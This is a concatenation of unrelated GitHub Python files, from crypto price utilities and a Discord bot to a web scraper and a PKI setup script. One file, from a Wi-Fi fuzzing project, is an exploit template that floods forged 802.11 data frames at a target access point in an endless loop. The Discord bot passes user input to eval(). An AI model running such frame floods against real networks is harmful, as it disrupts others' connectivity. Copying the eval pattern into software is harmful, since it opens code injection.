start_str=start_date,
end_str=end_date)
closing_price = BinanceDataFrame(klines)['Close']
portfolio[f"{asset.replace('USDT','')}"] = closing_price
except Exception as e:
raise
return portfolio
def _is_usdt_valid(coin, ticker):
allowed = ['BTC', 'ETH', 'BNB', 'ETH']
if coin in allowed:
if ticker != f'{coin}USDT':
return False
return True
def get_historical(coin,
start_date,
end_date=None,
interval="1DAY"):
"""
Example date format: December 1, 2021 UTC
Example timestamp date format:
dt_string = '18/09/19 01:55:19'
dt = datetime. strptime(dt_string, '%d/%m/%y %H:%M:%S')
start = int(dt.timestamp() * 1000)
Intervals: "1MINUTE", "3MINUTE", "5MINUTE", "15MINUTE ", "30MINUTE ",
"1HOUR", "2HOUR", "4HOUR", "6HOUR", "8HOUR",
"12HOUR ", "1DAY", "3DAY", "1WEEK", "1MONTH
Default interval: "1DAY"
"""
client = _get_client()
ticker = get_usdt_tickers([coin])
if not ticker:
raise Exception("Ticker not found: {}".format(coin))
if len(ticker) > 1:
raise Exception("Multiple tickers found: {}".format(ticker))
ticker = ticker.pop()
interval = interval_mapping.get(interval)
if not interval:
interval = interval_mapping["1DAY"]
data = pd.DataFrame()
try:
klines = client.get_historical_klines(
symbol=ticker,
interval=interval,
start_str=start_date,
end_str=end_date)
closing_price = BinanceDataFrame(klines)['Close']
except Exception as e:
raise
data[f"{coin}"] = closing_price
return data
def get_months_ago(coins, n=31):
one_month_ago = datetime.today() - timedelta(days=n)
one_month_ago = int(one_month_ago.timestamp() * 1000)
return get_portfolio_data(coins,
one_month_ago)
def get_weeks_ago(coins, n=7):
week_ago = datetime.today() - timedelta(days=n)
week_ago = int(week_ago.timestamp() * 1000)
return get_portfolio_data(coins,
week_ago)
def get_years_ago(coins, n=365):
year_ago = datetime.today() - timedelta(days=n)
year_ago = int(year_ago.timestamp() * 1000)
return get_portfolio_data(coins,
year_ago)
def get_price_variation(interval, coins):
handler = {
'month': get_months_ago,
'week': get_weeks_ago,
'year': get_years_ago,
}
if interval not in handler.keys():
raise Exception("[get_price_variation] Invalid interval {}".format(interval))
data = handler[interval](coins)
data = ((data.diff(len(data)-1).dropna() / data.iloc[-1:]) * 100).round(1)
variations = {coin:_get_symbol(variation[0]) for coin, variation in data.iteritems()}
return _prepare_variation_message(variations)
def _get_symbol(variation):
if variation <= 0:
return '🔴' + ' ' + str(variation) + '%'
return '🟢' + ' ' + str(variation) + '%'
def _prepare_variation_message(variations):
"""
Assemble variations and build a message to be send
:param dict variations: dictionary with the variations eg. {'BTC': -3.5}
"""
message = "\n".join("{} {}".format(k,v) for k,v in variations.items())
return message
| c4road/wp-bot-cdk | wp-sns-lambda/services/binance.py | binance.py | py | 7,189 | python | en | code | 0 | github-code | 50 |
74536154715 | from scapy.all import Dot11, RadioTap, sendp
from random import randint
dot11 = Dot11(type=2, subtype={SUBTYPE}, FCfield={FCf}, addr1={DESTINATION_MAC}, addr2={SOURCE_MAC}, addr3={AP_MAC}, SC={SC}, addr4={SOURCE_MAC})
MAC_header = RadioTap()/dot11
payload = {SEED}
frame = MAC_header / payload
print('\n- - - - - - - - - - - - - - - -')
print('Testing the exploit')
print('- - - - - - - - - - - - - - - - ')
while True:
sendp(frame, count=1, iface={ATT_INTERFACE}, verbose=0)
| efchatz/WPAxFuzz | exploits/exploit_data.py | exploit_data.py | py | 484 | python | en | code | 120 | github-code | 50 |
3144955621 | #!/usr/bin/env python
import rospy
from blockChainPack_.msg import lastHash
nodeList = ['NODE1', 'NODE2', 'NODE3']
nodeONOFF = [1,0,0]
oldNodeONOFF = [0,0,0]
def callback(data):
if data.nodeName in nodeList:
nodeONOFF[nodeList.index(data.nodeName)] = 1
print(nodeONOFF)
def main():
rospy.Subscriber('Last_Hash', lastHash, callback)
rospy.spin()
if __name__ == '__main__':
rospy.init_node('authentication', anonymous="True")
main()
# create all the node folders
# get all nodes to send their text files
# run a comparison script, find the average
# if identical, blockchain isn't compromised
# if not identical, reissue node with uncompromised files
# maybe write a custom message
# what about just sending the last block hash from each blockchain, if the strings don't match, authentication fails.
# | willdavis576/BlockChainResearch | 00blockChain_ws/src/blockChainPack_/src/scripts/Unused Currently/authentication1.py | authentication1.py | py | 845 | python | en | code | 0 | github-code | 50 |
18741540647 | # import spidevRead as sr
import time
import serial
import dbConn as dC
ser = serial.Serial('/dev/ttyAMA0', 9600, timeout=1)
while True:
data = ser.readline().decode() # read the data from the serial port and decode it
if "temperature:" in data:
temperature = int(data.split(":")[1]) # extract the temperature value
temperatureValue=temperature
dC.insertSensor1(temperatureValue)
print("Temperature:",temperatureValue)
time.sleep(1)
if "humidity:" in data:
humidity = int(data.split(":")[1]) # extract the humidity value
humidityValue = humidity #습도
dC.insertSensor2(humidityValue)
print("Humidity:",humidityValue)
time.sleep(1)
if "light :" in data:
adc1 = int(data.split(":")[1]) # extract the ADC1 value
adc1Value = adc1 #조도
dC.insertSensor3(adc1Value)
print("light:",adc1Value)
time.sleep(1)
if "soil :" in data:
adc2 = int(data.split(":")[1]) # extract the ADC2 value
adc2Value= adc2 #토양습도
dC.insertSensor4(adc2Value)
print("soil:",adc2Value)
time.sleep(1)
| CoreanAnt/iot_project | PyQT/etc/sensordb/ex11_sensorDB.py | ex11_sensorDB.py | py | 1,268 | python | en | code | 0 | github-code | 50 |
33599419364 | from django.shortcuts import render
from .updateTables import updateTables
from .models import parkingLot, parkingSpot
import json
from django.core.serializers.json import DjangoJSONEncoder
from django.http import JsonResponse
from datetime import datetime, timezone
from django.views.decorators.cache import never_cache
@never_cache # don't cache pictures - important for displaying updated pictures of lots
def parking(request):
# get parkingLot and parkingSpot tables
parking_lots = parkingLot.objects.all()
parking_spots = parkingSpot.objects.all()
# find elapsed time since images segmented
now = datetime.now(timezone.utc)
first_lot_time = parking_lots[0].lastUpdate
elapsed_time = now - first_lot_time
print(elapsed_time.seconds)
# call updateTables() if it has been more than 600 seconds since the tables were last updated
if(elapsed_time.seconds > 300):
for p in parking_lots:
parkingLot.objects.filter(lotName = p.lotName).update(lastUpdate=datetime.now(timezone.utc))
updateTables()
# get the parking lots longitude and latitude - needed since json encoding cannot encode Geoposition
parking_lots_list = []
for p in parking_lots:
dictionary = {"lotName": p.lotName, "lat":p.lotPosition.latitude, "long":p.lotPosition.longitude}
parking_lots_list.append(dictionary)
parking_lots_json = json.dumps(parking_lots_list, cls=DjangoJSONEncoder)
# static path for all of the images
images = []
for p in parking_lots:
path = 'media/' + p.lotName + '_segmented.jpg'
images.append(path)
# get the parking spots longitude and latitude - needed since json encoding cannot encode Geoposition
parking_spots_list = []
for p in parking_spots:
dictionary = {"lat":p.position.latitude, "long":p.position.longitude, "occupied":p.occupied}
parking_spots_list.append(dictionary)
parking_spots_json = json.dumps(parking_spots_list, cls=DjangoJSONEncoder) # turn paring_spots_list to json
"""
# get occupied history for today
today = date.today()
spots_for_today = occupiedHistory.objects.filter(time__year=today.year,time__month=today.month, time__day=today.day)
print(spots_for_today)
todays_spots = []
for s in spots_for_today:
s_time = s.time.time()
s_time = "{:02d}".format(s_time.hour) + ":" + "{:02d}".format(s_time.minute) + ":" + "{:02d}".format(int(s_time.second))
todays_spots.append({"date":s_time, "total": s.totalSpots})
# todays_spots.append({"time":str(s.time.time()), "total": s.totalSpots})
todays_spots = json.dumps(todays_spots) # turn todays spots to json file
"""
# return render of parking.html with context
return render(request, 'parking/parking.html', context={"parking_lots":parkingLot.objects.all,
"parking_spots":parkingSpot.objects.all,
"images": images,
"parking_spots_json":parking_spots_json,
"parking_lots_json":parking_lots_json,
})
| RamseyV/Parking | views.py | views.py | py | 2,940 | python | en | code | 0 | github-code | 50 |
23792666625 | class Solution:
def maxProfit(self, prices: List[int]) -> int:
min = 999999
max = 0
for i in range(len(prices)):
if prices[i] <= min:
min = prices[i]
if prices[i] - min > max:
max = prices[i] - min
return max
class Solution:
def maxProfit(self, prices: List[int]) -> int:
profit = 0
minimum = int(1e9)
for i in range(len(prices)):
# print(maximum, minimum)
if prices[i] < minimum:
minimum = min(minimum, prices[i])
elif prices[i] - minimum >= profit:
profit = max(profit, prices[i] - minimum)
return profit
| innjuun/Algorithm | LeetCode/easy/121.py | 121.py | py | 706 | python | en | code | 2 | github-code | 50 |
13885453082 | # -*- coding: utf-8 -*-
import scrapy
from bookparser.items import BookparserItem
class LabirintSpider(scrapy.Spider):
name = 'labirint'
allowed_domains = ['labirint.ru']
# Поисковый запрос - программирование
start_urls = ['https://www.labirint.ru/search/%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5/?available=1&wait=1&preorder=1&paperbooks=1&ebooks=1']
def parse(self, response):
book_links = response.xpath("//div[contains (@class, 'card-column')]/div/div/a[@class='product-title-link']/@href").extract()
next_page = response.xpath("//a[@class='pagination-next__text']/@href").extract_first()
for link in book_links:
yield response.follow(link, callback=self.book_parse)
yield response.follow(next_page, callback=self.parse)
def book_parse(self, response):
url = response.url
title = response.xpath("//div[@id='product-title']/h1/text()").extract_first()
authors = response.xpath("//div[@class='authors']/a[@data-event-label='author']/text()").extract()
price = response.xpath("//span[@class='buying-priceold-val-number']/text()").extract_first()
discount_price = response.xpath("//span[@class='buying-pricenew-val-number']/text()").extract_first()
rating = response.xpath("//div[@id='rate']/text()").extract_first()
yield BookparserItem(url=url,
title=title,
authors=authors,
price=price,
discount_price=discount_price,
rating=rating)
| sokolenkomikhail/data_collection | lesson_06/bookparser/spiders/labirint.py | labirint.py | py | 1,696 | python | en | code | 0 | github-code | 50 |
10965043853 | from modulos.bd.servicios import Servicios_BD
from modulos.base.modelo import ModeloBase
from modulos.base.servicios import ServiciosBase
#cli_services=CLIservices()
#cliente_n1=cli_services.prompt_cliente()
base_datos=Servicios_BD()
conexion=base_datos.conexion_bd()
Servicios_Base=ServiciosBase()
"""
-tenemos objeto ModeloBase que es un object
-Para por ejemplo guardar eso en la base de datos
"""
#cliente=ModeloBase('Richard','Coleman','rickycole@gmail.com','3434568689')
#Esto no funciona porque las clases abstractas no se instancian directamente
class Cliente(ModeloBase):
nombre:str=None
apellido:str=None
email:str=None
telefono:str=None
class CLIservices:
def prompt_cliente(self)->Cliente:
cliente=Cliente()
cliente.nombre=input('nombre: ')
cliente.apellido=input('apellido: ')
cliente.email=input('email: ')
cliente.telefono=input('telefono: ')
return cliente
#nuevo_proveedor="INSERT INTO proveedores(nombre,email,telefono) VALUES ('RocioSRL','iguana@gmail.com','4356978')"
#nuevo=base_datos.operacion_escritura(nuevo_proveedor)
consulta='select * from proveedores'
results=base_datos.operacion_lectura(consulta)
print(results)#Lista de diccionarios
#item to row objeto a fila (registro)
#row to sql fila a string sql
#row to item fila a objeto
#TypeError: Can't instantiate abstract class ServiciosBase with abstract methods fila_a_item, fila_a_sql, item_a_fila
class ejemplo(ModeloBase):
nombre:str=None
apellido:str=None
instancia=ejemplo()
instancia.nombre="Lore"
instancia.apellido="Ope"
objeto_1=Servicios_Base.item_a_fila(instancia) | RocioDure12/Tienda_app | main.py | main.py | py | 1,647 | python | es | code | 0 | github-code | 50 |
3436893210 | import spacy
nlp = spacy.load('en_core_web_md')
description = """Will he save
their world or destroy it? When the Hulk becomes too dangerous for the
Earth, the Illuminati trick Hulk into a shuttle and launch him into space to a
planet where the Hulk can live in peace. Unfortunately, Hulk land on the
planet Sakaar where he is sold into slavery and trained as a gladiator."""
# Movie description for comparisons.
def watch_next(info): # Define the watch_next function.
movies = open("movies.txt", "r") # Open the movie.txt file and read contents.
split_movie_list = [] # Create an empty list which will store our similarities.
for i in movies: # Split movies in the file into title and description.
split_movie_list.append(i.split(':'))
count = len(split_movie_list) # Count the number of movies in text file.
sim_list = [] # This list will store similar similarity values for the movies.
my_model_sentence = nlp(info)
for i in range(0, count):
sim_list.append(nlp(split_movie_list[i][1]).similarity(my_model_sentence))
# Check similarity between movie description and descriptions of recently watched movies.
max_similarity = max(sim_list) # This gives us the max similarity value.
max_similarity_movie = sim_list.index(max_similarity) # Produce an index of highest similarity values.
return split_movie_list[max_similarity_movie][0] # And return movie title with highest similarity to the watched movie.
print("We recommend you watch this next: " + watch_next(description))
# Print a recommendation for the movie in the .txt file with the highest similarity to the watched movie. | Yelya8/Watch_next.py | watch_next.py | watch_next.py | py | 1,689 | python | en | code | 0 | github-code | 50 |
74067656154 | from typing import Dict, List, Union
from multimodal_challenge.multimodal_object_init_data import MultiModalObjectInitData
class DatasetTrial:
"""
Parameters for defining a trial for dataset generation.
"""
def __init__(self, target_object: MultiModalObjectInitData, force: Dict[str, float],
magnebot_position: Dict[str, float],
target_object_position: Dict[str, float],
distractors: List[Union[dict, MultiModalObjectInitData]]):
"""
:param target_object: [`MultiModalObjectInitData` initialization data](multimodal_object_init_data.md) for the target object.
:param force: The initial force of the target object as a Vector3 dictionary.
:param magnebot_position: The initial position of the Magnebot.
:param target_object_position: The final position of the target object.
:param distractors: Initialization data for the distractor objects.
"""
# Load the drop parameters from a dictionary.
if isinstance(target_object, dict):
target_object: dict
""":field
target_object: [`MultiModalObjectInitData` initialization data](multimodal_object_init_data.md) for the target object.
"""
self.target_object = MultiModalObjectInitData(**target_object)
else:
self.target_object: MultiModalObjectInitData = target_object
""":field
The initial force of the target object as a Vector3 dictionary.
"""
self.force: Dict[str, float] = force
""":field
The initial position of the Magnebot.
"""
self.magnebot_position: Dict[str, float] = magnebot_position
""":field
The final position of the target object.
"""
self.target_object_position: Dict[str, float] = target_object_position
""":field
Initialization data for the distractor objects.
"""
self.distractors: List[MultiModalObjectInitData] = [d if isinstance(d, MultiModalObjectInitData) else
MultiModalObjectInitData(**d) for d in distractors]
| chuangg/find_fallen_objects | docker/multimodal_challenge/dataset/dataset_trial.py | dataset_trial.py | py | 2,192 | python | en | code | 6 | github-code | 50 |
26148197365 | from math import log,exp,ceil
from sys import stdin
r = stdin.readline
n = r().strip()
eps = 1e-6
while n!="":
n = int(n)
p = int(r().strip())
try:
sol = exp(log(p)/n)
csol = ceil(sol)
if csol-sol<eps:
print(csol)
else:
print(round(sol))
except ValueError:
print(p)
n = r().strip()
| michaelgy/PROBLEMS_PROGRAMMING | UVA/113.py | 113.py | py | 375 | python | en | code | 0 | github-code | 50 |
36537975361 | from bottle import route, run, request, response, HTTPResponse
from rembg import remove
import io
import json
import tempfile
import os
@route('/detourer_image', method='POST')
def detourer_image():
if 'image' not in request.files:
error_response = {'error': 'Pas d\'image envoyée'}
return HTTPResponse(body=json.dumps(error_response), status=400, content_type='application/json')
image = request.files.get('image')
with tempfile.NamedTemporaryFile(delete=False, suffix='.png') as img_temp:
img_temp.write(image.file.read())
img_temp.flush()
img_temp_path = img_temp.name
with open(img_temp_path, 'rb') as img_file:
img_result_bytes = io.BytesIO(remove(img_file.read()))
os.remove(img_temp_path)
response.content_type = 'image/png'
response.set_header('Content-Disposition', 'attachment; filename=result.png')
return img_result_bytes.getvalue()
if __name__ == '__main__':
run(host='0.0.0.0', port=8080, debug=True)
| SCcagg5/remove_background | api.py | api.py | py | 1,008 | python | en | code | 0 | github-code | 50 |
75165252956 | from MachineLearning.DT_Model.CART import LeafNode
from MachineLearning.DT_Model.CART import TreeNode
from MachineLearning.DT_Model.CART import CART
import random
import matplotlib.pyplot as plt
import numpy as np
class Forest:
def __init__(self, frame, col):
self.set = []
self.frame = frame
self.col = col
self.cart = CART(frame=frame, col=col)
'''
绘制森林及分类点散点图(分类属性为2的情况下)
'''
def drawPicture(self):
att = []
for each in self.frame:
if each != self.col:
att.append(each)
bFrame = self.frame.loc[self.frame[self.col] == 1]#正例点
sFrame = self.frame.loc[self.frame[self.col] == 0]#负例点
plt.rcParams['font.sans-serif'] = ['KaiTi'] # 指定默认字体
plt.rcParams['axes.unicode_minus'] = False # 解决保存图像是负号'-'显示为方块的问题
plt.scatter(x=bFrame[att[0]],y=bFrame[att[1]],marker="+",s=100)
plt.scatter(x=sFrame[att[0]],y=sFrame[att[1]],marker="*",s=100) #散点图
self.plot_decision_boundary() #分类图
plt.title("随机森林的分类结果图")
plt.xlabel(att[0])
plt.ylabel(att[1])
plt.savefig("随机森林的分类结果图.png")
plt.show()
'''
绘制决策边界的函数
'''
def plot_decision_boundary(self):
X = self.frame["密度"]
Y = self.frame["含糖率"]
# 设定最大最小值,附加一点点边缘填充
x_min, x_max = min(X) - 0.1, max(X) + 0.1
y_min, y_max = min(Y) - 0.1, max(Y) + 0.1
h = 0.005
# 图像上的点集
xx, yy = np.arange(x_min, x_max, h), np.arange(y_min, y_max, h)
for i in range(0, len(yy)):
tem = self.predict(obj={"密度": xx[0], "含糖率": yy[i]})
startx = 0
for j in range(1, len(xx)):
temp = self.predict(obj={"密度": xx[j], "含糖率": yy[i]})
if temp != tem:
plt.plot([xx[startx], xx[j]], [yy[i], yy[i]], c="g" if tem >= 0 else "r", linewidth=1)
tem = temp
startx = j
if j == len(xx) - 1:
plt.plot([xx[startx], xx[j]], [yy[i], yy[i]], c="g" if tem >= 0 else "r", linewidth=1)
'''
工具函数,根据给出的字典{value:nums}找出出现次数(nums)最多的值(value)
@:param dic 字典
'''
def getMode(self, dic):
xmean = 0
max = 0
for each in dic.keys():
if dic[each] > max:
xmean = each
max = dic[each]
return xmean
'''
工具函数,根据给出的列表获取其出现次数字典
@:param list 列表
'''
def getDic(self, lines):
dic = {}
for each in lines:
if each in dic.keys():
dic[each] += 1
else:
dic[each] = 1
return dic
'''
绘制每棵树的预测结果
'''
def generateLine(self, root, lines, xName, yName):
if str(type(root)) != "<class 'MachineLearning.DT_Model.CART.LeafNode'>":
if root.name == xName:
lines["x"].append(root.value)
self.generateLine(root.lchild, lines, xName, yName)
self.generateLine(root.rchild, lines, xName, yName)
else:
lines["y"].append(root.value)
self.generateLine(root.lchild, lines, xName, yName)
self.generateLine(root.rchild, lines, xName, yName)
'''
生成森林
'''
def generateForest(self):
for i in range(0, 13):
set = []
for i0 in range(0, len(self.frame)//2):
set.append(random.randint(0, len(self.frame) - 1))
table = self.frame.iloc[set]
self.set.append(self.generateTree(table))
'''
根据训练出来的随机森林做预测
'''
def predict(self, obj):
sum = 0
for each in self.set:
it = int(self.preTree(obj, root=each))
if it == 0:
sum -= 1
else:
sum += 1
return sum
'''
根据单个决策树进行预测
'''
def preTree(self, obj, root):
node = root
while str(type(node)) != "<class 'MachineLearning.DT_Model.CART.LeafNode'>":
if obj[node.name] >= node.value:
node = node.lchild
else:
node = node.rchild
return node.val
'''
连续的最优划分属性试探法
'''
def bestAttri(self, table):
sumMin = 100
recordValue = None
recordName = None
if len(table) == 0:
return [None,None]
for each in table:
if each != self.col:
# 统计每个取值的最小基尼指数, numsTable = {value:nums}
numsTable = self.cart.calFrequ(table, each)
for value in numsTable:
valueGini = numsTable[value] / len(table) * self.cart.Gini(table.loc[table[each] >= value]) + (
1 - numsTable[value]) * self.cart.Gini(table.loc[table[each] < value])
if valueGini < sumMin:
sumMin = valueGini
recordValue = value
recordName = each
return [recordValue, recordName]
'''
根据所给表格生成一棵树的算法
'''
def generateTree(self, table):
# 计算最优划分属性
list = self.bestAttri(table)
# 如果是叶子结点,那么直接生成并返回
if self.cart.isLeafNode(table):
return LeafNode(table.iloc[0][self.col])
# 如果根据最优划分属性无法继续划分了
if self.cart.canNotDevide(table, list):
for i in range(0, len(table)):
if table.iloc[i][list[1]] == list[0]:
return LeafNode(table.iloc[i][self.col])
left = table.loc[table[list[1]] >= list[0]]
right = table.loc[table[list[1]] < list[0]]
# 否则是非叶子结点
return TreeNode(self.generateTree(left),
self.generateTree(right), list[1], list[0]) | Y-J-9/MachineLearning | RF_Model/random_forest.py | random_forest.py | py | 6,350 | python | en | code | 0 | github-code | 50 |
9309106724 | import io
import discord
from discord import app_commands
from discord.ext import commands, tasks
from discord.ui import Select, View
from files import texts, goobers, lang_codes, quote_translation
import requests
import random
from datetime import datetime
import pytz
from PIL import Image, ImageDraw
import inflect
import os
from dotenv import load_dotenv
load_dotenv()
p = inflect.engine()
# more functionality, but it's still kinda messy
bot = commands.Bot(command_prefix="/", intents=discord.Intents.all())
@bot.event
async def on_ready():
print(f"{bot.user} is now running!")
try:
synced = await bot.tree.sync()
print(f"Synced {len(synced)} command(s)")
except Exception as e:
print(e)
papiez.start()
@tasks.loop(seconds=60)
async def papiez():
channel = bot.get_channel(1034863959964143666)
pl_date = datetime.now(pytz.timezone('Poland'))
pl_time = pl_date.strftime('%H:%M')
if pl_time == "21:37":
await channel.send("papiez")
@bot.event
async def on_message(message):
if message.author == bot.user:
return
lst = [1034863959964143666] # bot-commands id
if message.channel.id in lst:
if message.embeds or message.attachments:
await message.add_reaction('❤')
return
if message.content == 'cool':
await message.channel.send("you too")
return
@bot.tree.command(name="hello")
async def hello(interaction: discord.Interaction):
await interaction.response.send_message(f"Hey {interaction.user.mention}!")
@bot.tree.command(name="icecream", description="testing timeouts")
async def icecream(interaction: discord.Interaction):
select = Select(
placeholder="Choose a flavor",
options=[
discord.SelectOption(label="vanilla", emoji="🤍", description="yum"),
discord.SelectOption(label="choco", emoji="🍫", description="yum"),
discord.SelectOption(label="strawberry", emoji="🍓", description="yum")]
)
view = View(timeout=30)
view.add_item(select)
async def my_callback(interaction):
await interaction.response.edit_message(content=f"Awesome, I like {select.values[0]} too!", view=view)
select.callback = my_callback
await interaction.response.send_message(view=view)
@bot.tree.command(name="embed", description="for testing embed designs")
async def embed(interaction: discord.Interaction):
embed = discord.Embed(
title="Quote:",
description="wise words",
color=0x000000)
embed.set_author(
name="John Paul the 2nd",
icon_url="https://cdn.discordapp.com/emojis/934972840594264104.webp?size=96&quality=lossless")
embed.add_field(
name="Quote translation:",
value=f"wise words(in english)",
inline=True)
await interaction.response.send_message(embed=embed)
@bot.tree.command(name="popequote", description="pope John Paul the 2nd's wisdom")
async def pope_quote(interaction: discord.Interaction):
quote = random.choice(list(quote_translation))
embed = discord.Embed(
title="Quote:",
description=f"*{quote}*",
color=0x000000)
embed.set_author(
name="John Paul the 2nd",
icon_url="https://media.discordapp.net/attachments/1060711805028155453/1060713256576106606/sc2.png?width=390&height=390")
embed.add_field(
name="Quote translation:",
value=f"*{quote_translation[quote]}*",
inline=True)
await interaction.response.send_message(embed=embed)
@bot.tree.command(name="fox", description="get a random fox")
async def fox(interaction: discord.Interaction):
foxer = requests.get("https://randomfox.ca/floof").json()
await interaction.response.send_message(foxer["image"])
@bot.tree.command(name="what", description="what?")
async def what(interaction: discord.Interaction):
await interaction.response.send_message(random.choice(texts))
@bot.tree.command(name="goober", description="Goofy Goobers Generator!")
async def goober(interaction: discord.Interaction):
await interaction.response.send_message(random.choice(goobers))
@bot.tree.command(name="calculate", description="lol math")
@app_commands.describe(expression="Type help for help")
async def calc(interaction: discord.Interaction, expression: str):
if expression.lower() == "help":
await interaction.response.send_message(f"Here's your help message") # could be an embed instead of a text msg
else:
try:
await interaction.response.send_message(f"{expression} = {eval(expression)}")
except:
await interaction.response.send_message(f"that's too ugly")
@bot.tree.command(name="say")
@app_commands.describe(thing_to_say="What should I say?")
async def say(interaction: discord.Interaction, thing_to_say: str):
await interaction.response.send_message(f"{interaction.user.name} said: `{thing_to_say}`")
@bot.tree.command(name="translate", description="translate stuff lol")
@app_commands.describe(translate_from="translate from:", translate_to="translate to:", message="the message you want to translate:")
async def translate(interaction: discord.Interaction, translate_from: str, translate_to: str, message: str):
first = translate_from.lower()
second = translate_to.lower()
if first not in lang_codes and second not in lang_codes:
await interaction.response.send_message(f"Sorry, I don't recognize either of those as languages", ephemeral=True)
return
if first not in lang_codes:
await interaction.response.send_message(f"Sorry, I don't recognize **{first}** as a language", ephemeral=True)
return
if second not in lang_codes:
await interaction.response.send_message(f"Sorry, I don't recognize **{second}** as a language", ephemeral=True)
return
url = "https://translated-mymemory---translation-memory.p.rapidapi.com/get"
querystring = {
"langpair": lang_codes[first] + "|" + lang_codes[second],
"q": message,
"mt": "1",
"onlyprivate": "0",
"de": "a@b.c"}
headers = {
"X-RapidAPI-Key": os.getenv('translation_key'),
"X-RapidAPI-Host": "translated-mymemory---translation-memory.p.rapidapi.com"}
response = requests.request("GET", url, headers=headers, params=querystring).json()
translated_msg = response['responseData']['translatedText']
# print(response) # for debugging
# print(translated_msg)
if response['quotaFinished'] is None:
await interaction.response.send_message(f"One of those languages flew out of my head...", ephemeral=True)
return
embed = discord.Embed(
color=0x000000)
embed.set_author(
name="Translation",
icon_url="https://cdn.discordapp.com/emojis/934972840594264104.webp?size=96&quality=lossless")
embed.add_field(
name=f"From {first}:",
value=message,
inline=True)
embed.add_field(
name=f"To {second}:",
value=translated_msg,
inline=True)
await interaction.response.send_message(embed=embed)
@bot.tree.command(name="palette", description="Get a random color palette")
async def palette(interaction: discord.Interaction):
# create an image with a black background
wide = 300
tall = int(wide/5)
image = Image.new('RGB', (wide, tall), (0, 0, 0))
draw = ImageDraw.Draw(image)
# get 5 random colors
url = "http://colormind.io/api/"
data = {"model": "default"}
response = requests.post(url, json=data).json()
colors = response["result"]
colors_better = [tuple(x) for x in colors]
# draw rectangles with the random colors on the image
x, y = 0, 0
width, height = wide/5, tall
for color in colors_better:
draw.rectangle((x, y, x+width, y+height), fill=color)
x += width
# save the image to a file-like object
image_data = io.BytesIO()
image.save(image_data, 'PNG')
image_data.seek(0)
# send the image data as an attachment
message = await bot.get_channel(1061811267834224649).send(file=discord.File(image_data, 'color_palette.png'))
# get the url of the image from the message attachments
image_url = message.attachments[0].url
# send the image url in an embed
embed = discord.Embed()
embed.set_author(
name="Here's your random color palette:",
icon_url="https://media.discordapp.net/attachments/1060711805028155453/1061825040716402731/logo_beter.png")
embed.set_image(
url=image_url)
embed.set_footer(
text="Generated with colormind.io")
# gg
await interaction.response.send_message(embed=embed)
@bot.tree.command(name="serverinfo", description="Inforomation about the server!")
async def serverinfo(interaction: discord.Interaction):
role_list = [str(role.name) for role in interaction.guild.roles if role.name != "@everyone"]
co_owner_role = interaction.guild.get_role(1001472749711147040)
creation_time = interaction.guild.created_at
try:
co_owners = ", ".join(str(member) for member in co_owner_role.members if member != interaction.guild.owner)
except:
co_owners = "Nobody!"
embed = discord.Embed(
title="Server information",
description=f"""🔹**Name:** {interaction.guild.name}
🔹**Id:** {interaction.guild.id}
🔹**Owner:** {interaction.guild.owner}
🔹**Co-owner(s):** {co_owners}""",
color=0x397fbf)
embed.add_field(
name="Members:",
value=f"""🔹**All:** {len(interaction.guild.members)}
🔹**Online:** {sum(member.status!=discord.Status.offline for member in interaction.guild.members)}""",
inline=True)
embed.add_field(
name="Channels:",
value=f"""🔹**Text:** {len(interaction.guild.text_channels)}
🔹**Voice:** {len(interaction.guild.voice_channels)}""",
inline=True)
embed.add_field(
name=f"Roles ({len(role_list)}):",
value=", ".join(role_list),
inline=False)
try:
icon_url = interaction.guild.icon.url
embed.set_thumbnail(url=icon_url)
except:
pass
embed.set_footer(
# ugliest datetime formating code ever
text=f"""Server creation date: {creation_time.strftime(f'{p.ordinal(creation_time.strftime("%d"))} %B %Y')}""")
await interaction.response.send_message(embed=embed)
@bot.tree.command(name="botinfo", description="Info about the bot")
async def botinfo(interaction: discord.Interaction):
creation_time = bot.user.created_at
bot_info = await bot.application_info()
owner = bot_info.owner
embed = discord.Embed(
title=f"{bot.user}",
description=f"{bot.user.name} knows much, tells some. {bot.user.name} knows many things others do not. {bot.user.name} wishes you well.",
color=0x397fbf)
embed.set_thumbnail(
url=f"{bot.user.avatar.url}")
embed.add_field(
name="Dev:",
value=f"{owner.name}#{owner.discriminator}",
inline=True)
embed.add_field(
name="Library:",
value=f"discord.py version {discord.__version__}",
inline=True)
embed.set_footer(
text=f"""Creation date: {creation_time.strftime(f'{p.ordinal(creation_time.strftime("%d"))} %B %Y')}""")
await interaction.response.send_message(embed=embed)
@bot.tree.command(name='choices')
@app_commands.describe(optionlol="pick a weather")
@app_commands.choices(optionlol=[
app_commands.Choice(name="rainy", value="why do I need this"),
app_commands.Choice(name="cloudy", value="why do I need this")
])
async def test(interaction: discord.Interaction, option: app_commands.Choice[str]):
await interaction.response.send_message(f"You chose: {option.name}")
bot.run(os.getenv('bot_key'))
| s00240122/Python-tings | YTTutorialDiscBot/slash_bot.py | slash_bot.py | py | 11,903 | python | en | code | 0 | github-code | 50 |
11982603493 | #Cryptographie appliquée
#Projet n°2: PKI et Python
#Auteur: Guillaume Paris
#Date: 07-11-2022
#Description: Ce programme permet de créer une autorité racine, une autorité d'enregistrement et un certificat client signé par l'autorité racine et l'autorité d'enregistrement.
import datetime
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa, dsa, ec
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
#Choisr l'algorithme de signature
si=input("Choisir l'algorithme de signature: 1 pour SHA1, 2 pour SHA256\n")
if si=="1":
signature=hashes.SHA1()
elif si=="2":
signature=hashes.SHA256()
else:
print("Erreur de saisie")
exit()
# Choisir l'algorithme de chiffrement et Génération de la clé privée
cipher=input("Choisir l'algorithme de chiffrement: 1 pour DSA, 2 pour RSA ou 3 pour ECDSA \n")
if cipher=="1":
key = dsa.generate_private_key(key_size=2048, backend=default_backend())
elif cipher=="2":
key = rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend())
elif cipher=="3":
key = ec.generate_private_key(ec.SECP384R1(), default_backend())
else:
print("Erreur de saisie")
exit()
# Créer son autorité racine: certificat et clé privée
if not os.path.exists("autorite_racine"):
os.makedirs("autorite_racine")
with open("autorite_racine/private_key.pem", "wb") as f:
f.write(key.private_bytes( encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption()))
